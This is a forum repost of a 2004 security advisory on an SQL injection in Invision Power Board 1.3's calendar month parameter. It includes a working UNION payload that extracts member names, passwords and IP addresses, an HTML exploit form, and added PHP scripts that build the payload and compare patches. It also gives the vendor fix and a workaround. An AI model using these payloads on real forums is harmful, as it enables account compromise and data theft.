Posted 03-30-2006 (#1) by emper0r, Senior Member (Join Date: Mar 2006)

Security Corporation Security Advisory [SCSA-025]

Invision Power Board SQL Injection Vulnerability
======================================================================

PROGRAM: Invision Power Board
HOMEPAGE: http://www.invisionboard.com
VULNERABLE VERSIONS: 1.3 FINAL
RISK: MEDIUM/HIGH
IMPACT: SQL Injection

RELEASE DATE: 2004-01-03


======================================================================
TABLE OF CONTENTS
======================================================================

1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6..................................................DISCLOSURE TIMELINE
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10...........................................................FEEDBACK


1. DESCRIPTION
======================================================================

Invision Power Board (IPB) is a professional forum system built from the ground up with speed and security in mind, taking advantage of object-oriented code, highly optimized SQL queries, and the fast PHP engine. A comprehensive administration control panel is included to help you keep your board running smoothly. Moderators will also enjoy the full range of options available to them via built-in tools and the moderator control panel. Members will appreciate the ability to subscribe to topics, send private messages, and perform a host of other actions through the user control panel. It is used by millions of people around the world.


2. DETAILS
======================================================================

- SQL Injection:

A vulnerability in the sources/calendar.php file allows unauthorized users to inject SQL commands through the calendar's month parameter.

Vulnerable code:

----------------------------------------------------
[...]

$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : $ibforums->input['m'];

[...]

$recurring = array();

[...]

$DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month={$this->chosen_month}) )
");

while ( $rec = $DB->fetch_row() )
{
    $recurring[] = $rec;
}

$events = array();

$DB->query("SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) )
");
----------------------------------------------------

$ibforums->input['m'] is the variable m sent by the user (the calendar's month parameter).

intval() always returns an integer: 0 for a string that does not start with a number, otherwise the number the string starts with. The test ( ! intval($ibforums->input['m']) ) therefore only asks whether the input begins with a non-zero number. If it does not (for example 'aaaaa'), intval() returns 0, the condition is true, and $this->chosen_month falls back to the current month: the user's value is discarded. At first sight, then, nothing but a number can get through.

But if the input does begin with a number, the value assigned to $this->chosen_month is not the result of intval(); it is the raw user string. intval('aaaa') returns 0, while intval('2aaaaa') returns 2: the argument only has to BEGIN with a digit.

So if we send m=2hophophop, $this->chosen_month becomes the string '2hophophop', and it is interpolated into the query unquoted.

The following query is then executed:

------------------------------------------------------------------------
SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month={$this->chosen_month}) )
------------------------------------------------------------------------

Since it is a SELECT, we can for example append a UNION.

The second SELECT must return the same number of columns as the first one (and, for the data to be usable, columns of compatible types). Since the first one selects every column (*) of ibf_calendar_events, we need to know that table's structure, which is:

-------------------------------------------------------
CREATE TABLE ibf_calendar_events (
  eventid mediumint(8) NOT NULL auto_increment,
  userid mediumint(8) NOT NULL default '0',
  year int(4) NOT NULL default '2002',
  month int(2) NOT NULL default '1',
  mday int(2) NOT NULL default '1',
  title varchar(254) NOT NULL default 'no title',
  event_text text NOT NULL,
  read_perms varchar(254) NOT NULL default '*',
  unix_stamp int(10) NOT NULL default '0',
  priv_event tinyint(1) NOT NULL default '0',
  show_emoticons tinyint(1) NOT NULL default '1',
  rating smallint(2) NOT NULL default '1',
  event_ranged tinyint(1) NOT NULL default '0',
  event_repeat tinyint(1) NOT NULL default '0',
  repeat_unit char(2) NOT NULL default '',
  end_day int(2) default NULL,
  end_month int(2) default NULL,
  end_year int(4) default NULL,
  end_unix_stamp int(10) default NULL,
  event_bgcolor varchar(32) NOT NULL default '',
  event_color varchar(32) NOT NULL default '',
  PRIMARY KEY (eventid),
  KEY unix_stamp (unix_stamp)
);
-------------------------------------------------------

So the result of the query has these 21 column types:
INT,INT,INT,INT,INT,VARCHAR,TEXT,VARCHAR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT,INT,INT,VARCHAR,VARCHAR

So if we send as $m (and thus as $this->chosen_month) the value:

2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/*

the query executed becomes:

SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month=2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/*) )

The leading "2 ))" closes the two parentheses the original query left open, and the trailing "/*" comments out the original closing parentheses, so the two SELECTs that actually run are:
- SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND ( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month=2 ))
- SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1



The second SELECT returns, for every row of ibf_members, four 0s, then the member's id, name, password and IP address, followed by thirteen 0s.
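Counting the 21 columns and the positions of the string-typed ones by hand is error-prone. The following script is an example added here; it is not part of the advisory or of Invision Power Board. It extracts the column list from the CREATE TABLE statement quoted above and assembles the UNION SELECT from a mapping of target column to member field. The four placements are exactly the ones used in the payload above; the type check is mine and refuses a mapping that would put a string field into a numeric position.

```php
<?php
// Added example: not code from the advisory or from Invision Power Board.
// Derives the UNION SELECT half of the payload from the table definition
// quoted in the advisory instead of counting columns by hand.

// Copied from the CREATE TABLE statement in section 2 of the advisory.
const CALENDAR_EVENTS_DDL = <<<'SQL'
CREATE TABLE ibf_calendar_events (
  eventid mediumint(8) NOT NULL auto_increment,
  userid mediumint(8) NOT NULL default '0',
  year int(4) NOT NULL default '2002',
  month int(2) NOT NULL default '1',
  mday int(2) NOT NULL default '1',
  title varchar(254) NOT NULL default 'no title',
  event_text text NOT NULL,
  read_perms varchar(254) NOT NULL default '*',
  unix_stamp int(10) NOT NULL default '0',
  priv_event tinyint(1) NOT NULL default '0',
  show_emoticons tinyint(1) NOT NULL default '1',
  rating smallint(2) NOT NULL default '1',
  event_ranged tinyint(1) NOT NULL default '0',
  event_repeat tinyint(1) NOT NULL default '0',
  repeat_unit char(2) NOT NULL default '',
  end_day int(2) default NULL,
  end_month int(2) default NULL,
  end_year int(4) default NULL,
  end_unix_stamp int(10) default NULL,
  event_bgcolor varchar(32) NOT NULL default '',
  event_color varchar(32) NOT NULL default '',
  PRIMARY KEY (eventid),
  KEY unix_stamp (unix_stamp)
);
SQL;

// Returns [column name => base type] in declaration order, skipping the
// index definitions. Sufficient for this DDL: no default contains a comma.
function table_columns(string $ddl): array
{
    $open    = strpos($ddl, '(');
    $close   = strrpos($ddl, ')');
    $body    = substr($ddl, $open + 1, $close - $open - 1);
    $columns = [];
    foreach (explode(',', $body) as $definition) {
        $definition = trim($definition);
        if (preg_match('/^(PRIMARY|UNIQUE|KEY|INDEX)\b/i', $definition)) {
            continue;   // index definition, not a column
        }
        if (preg_match('/^(\w+)\s+([a-z]+)/i', $definition, $m)) {
            $columns[$m[1]] = strtolower($m[2]);
        }
    }
    return $columns;
}

// Builds "SELECT <expr>,<expr>,... FROM ibf_members m WHERE 1" with one
// expression per column of the table being injected into. $mapping is
// target column => [expression, does the expression yield a string?].
function union_select(array $columns, array $mapping): string
{
    $stringTypes = ['char', 'varchar', 'text'];
    $exprs = [];
    foreach ($columns as $name => $type) {
        if (!isset($mapping[$name])) {
            $exprs[] = '0';   // filler for a position we do not use
            continue;
        }
        [$expr, $isString] = $mapping[$name];
        if ($isString && !in_array($type, $stringTypes, true)) {
            throw new InvalidArgumentException("{$expr} needs a string column, {$name} is {$type}");
        }
        $exprs[] = $expr;
    }
    return 'SELECT ' . implode(',', $exprs) . ' FROM ibf_members m WHERE 1';
}

// The placements the advisory uses: id into mday (int); name, password and
// ip_address into the three string columns title, event_text, read_perms.
$mapping = [
    'mday'       => ['m.id',         false],
    'title'      => ['m.name',       true],
    'event_text' => ['m.password',   true],
    'read_perms' => ['m.ip_address', true],
];

$columns = table_columns(CALENDAR_EVENTS_DDL);
printf("%d columns: %s\n", count($columns), implode(',', $columns));
echo '2 )) UNION ' . union_select($columns, $mapping) . "/*\n";
```

Run with `php`; the second output line is the same payload as in the advisory, with 13 trailing zeros. Swapping the mapping to put m.name into, say, userid makes union_select() throw instead of silently producing a query whose string data would be coerced.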

ATTENTION! The query is executed, but nothing is displayed.

Later in the script a second query uses the same $this->chosen_month:

SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month={$this->chosen_month} AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) )

which with our value becomes:

SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND month=2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/* AND year={$this->chosen_year} OR (event_ranged=1 AND ( unix_stamp < $timenow AND end_unix_stamp > $timenow ) )

Here there is no open parenthesis for the "))" to close, so this query is a syntax error and the script stops before rendering anything. The first query has nevertheless already been executed, and there are of course other ways to make use of that.
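As an added illustration of the analysis above (my code, not the advisory's or Invision's), the following script reproduces the month coercion quoted in the vulnerable code and builds both calendar queries for the three kinds of input discussed: a non-numeric string, a string that merely begins with a digit, and the UNION payload. The current month and $timenow are stand-ins; paren_balance() is a helper of mine that counts parentheses in the part MySQL will parse (before the /* comment), which is enough to see why the first query parses and the second does not.

```php
<?php
// Added example: not code from the advisory or from Invision Power Board.
// Reproduces the month coercion of sources/calendar.php (IPB 1.3) as quoted
// in the advisory and shows what each of the two query strings becomes.

// Same expression as the vulnerable code: intval() only decides whether to
// fall back; the raw user string is what gets interpolated.
function vulnerable_chosen_month(string $m, int $currentMonth): string
{
    return (!intval($m)) ? (string) $currentMonth : $m;
}

// First query from the advisory (recurring events).
function first_query(string $month): string
{
    return "SELECT * FROM ibf_calendar_events WHERE event_repeat=1 AND "
         . "( repeat_unit IN ('w','m') OR (repeat_unit='y' AND month={$month}) )";
}

// Second query from the advisory (non-recurring and ranged events).
function second_query(string $month, string $year, int $timenow): string
{
    return "SELECT * FROM ibf_calendar_events WHERE event_repeat <> 1 AND "
         . "month={$month} AND year={$year} OR (event_ranged=1 AND "
         . "( unix_stamp < {$timenow} AND end_unix_stamp > {$timenow} ) )";
}

// Net count of '(' minus ')' in the part MySQL parses, i.e. before the /*
// that comments out the rest. 0 means balanced; a negative value means a
// stray ')' and therefore a syntax error.
function paren_balance(string $sql): int
{
    $visible = explode('/*', $sql, 2)[0];
    return substr_count($visible, '(') - substr_count($visible, ')');
}

$payload = "2 )) UNION SELECT 0,0,0,0,m.id,m.name,m.password,m.ip_address,"
         . "0,0,0,0,0,0,0,0,0,0,0,0,0 FROM ibf_members m WHERE 1/*";

$samples = [
    ['aaaaa',      'intval() is 0 (falsy): current month substituted'],
    ['2hophophop', 'intval() is 2 (truthy): raw string interpolated'],
    [$payload,     'intval() is 2 (truthy): UNION reaches the database'],
];

$currentMonth = 1;          // stand-in for $this->now_date['mon']
$timenow      = 1073088000; // stand-in for $timenow (2004-01-03 00:00 UTC)

foreach ($samples as [$m, $why]) {
    $month = vulnerable_chosen_month($m, $currentMonth);
    $q1 = first_query($month);
    $q2 = second_query($month, '2004', $timenow);
    echo "m = {$m}\n   {$why}\n";
    echo "   query 1 (balance " . paren_balance($q1) . "): {$q1}\n";
    echo "   query 2 (balance " . paren_balance($q2) . "): {$q2}\n\n";
}
```

For the payload, query 1 reports a balance of 0 (the "2 ))" exactly closes the two parentheses the original query opened) while query 2 reports -2: that is the stray ")" pair that makes the second query fail and keeps the UNION's rows from ever being rendered.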


3. EXPLOITS
======================================================================

- SQL Injection:

--------------------IPBexploit.html--------------------

<html>
<head>
<title>Invision Power Board Free 1.3 FINAL SQL Injection Problems</title>
</head>
<body>
<form action='/index.php?act=calendar' method='post'
      onsubmit="this.m.value='2 )) UNION '+this.request.value+'#';this.action=this.url.value+'/index.php?act=calendar';">
IPB directory URL : <input type='text' size='45' name='url' value='http://forum.target.com'><br><br>

SQL SELECT REQUEST : <input type='text' size='80' name='request' value='SELECT * FROM ibf_calendar_events'><br><br>

Attention : The request result MUST have this structure :<br>
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT,INT,INT,STR,STR<br><br>

<input type='hidden' name='y' value='2004'>
<input type='hidden' name='m'>
<input type='submit' value='Execute'>
</form>

<p align="right">A patch can be found on phpSecure.info.<br>
For more information about this exploit :
<a href="http://www.security-corporation.com/advisories-025.html" target="_blank">Security-Corporation.com</a></p>
</body>
</html>

--------------------IPBexploit.html--------------------


4. SOLUTIONS
======================================================================

A patch can be found at the following link: http://www.phpsecure.info

Invision Power Services was notified and has released a fix:
http://forums.invisionpower.com/index.php?act=ST&f=1&t=108786

5. WORKAROUND
======================================================================

In sources/calendar.php replace the following lines:

------------------------------------------------------------------------
$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : $ibforums->input['m'];
$this->chosen_year  = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : $ibforums->input['y'];
------------------------------------------------------------------------

by:

------------------------------------------------------------------------
$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon'] : intval($ibforums->input['m']);
$this->chosen_year  = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : intval($ibforums->input['y']);
------------------------------------------------------------------------

Casting the value that is actually used to an integer means that at most the leading number of the input can reach the query. The year parameter ($y) is interpolated unquoted into the second query in the same way, which is why it gets the same treatment.
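To check what the workaround changes, here is a comparison I am adding (not the advisory's or the vendor's code): the original coercion, the patched one, and a stricter variant of mine that only accepts a whole-string integer between 1 and 12. The sample inputs are the ones discussed in section 2, a shortened form of the payload, and two plain numbers.

```php
<?php
// Added example: not code from the advisory or from Invision Power Board.
// Compares the original month coercion, the workaround above, and a stricter
// range-validated variant (the last one is my addition, not the vendor fix).

// Before: intval() only decides whether to fall back; the raw string is used.
function chosen_month_vulnerable(string $m, int $current): string
{
    return (!intval($m)) ? (string) $current : $m;
}

// Workaround: the value actually used is intval()'d as well, so at most the
// leading digits of the input reach the query.
function chosen_month_patched(string $m, int $current): int
{
    return (!intval($m)) ? $current : intval($m);
}

// Stricter (mine): the whole input must be an integer in 1..12, otherwise
// fall back to the current month. Rejects '13' and '2hophophop' alike.
function chosen_month_strict(string $m, int $current): int
{
    $month = filter_var($m, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 12]]);
    return $month === false ? $current : $month;
}

$current = 1; // stand-in for $this->now_date['mon']
$samples = ['aaaaa', '2hophophop', '2 )) UNION SELECT 0,0 FROM ibf_members/*', '13', '7'];

printf("%-42s | %-42s | %-7s | %s\n", 'input', 'vulnerable', 'patched', 'strict');
foreach ($samples as $m) {
    printf("%-42s | %-42s | %-7d | %d\n",
        $m,
        chosen_month_vulnerable($m, $current),
        chosen_month_patched($m, $current),
        chosen_month_strict($m, $current));
}
```

With the workaround, '2hophophop' and the payload both collapse to 2 and '13' stays 13 (harmless for SQL, but not a month); the strict variant maps all three to the current month and only lets '7' through unchanged.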


6. DISCLOSURE TIMELINE
======================================================================

30/12/2003 Vulnerability discovered
30/12/2003 Vendor notified
02/01/2004 Vendor response
02/01/2004 Security Corporation clients notified
02/01/2004 Started e-mail discussions
03/01/2004 Last e-mail received
03/01/2004 Public disclosure


7. CREDITS
======================================================================

emper0r, Wolf

8. DISCLAIMER
======================================================================

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.


9. REFERENCES
======================================================================

- Original version:
http://www.security-corporation.com/advisories-025.html

- French version:
http://www.security-corporation.com/index.php?id=advisories&a=025-FR


10. FEEDBACK
======================================================================

Please send suggestions, updates, and comments to:

emper0r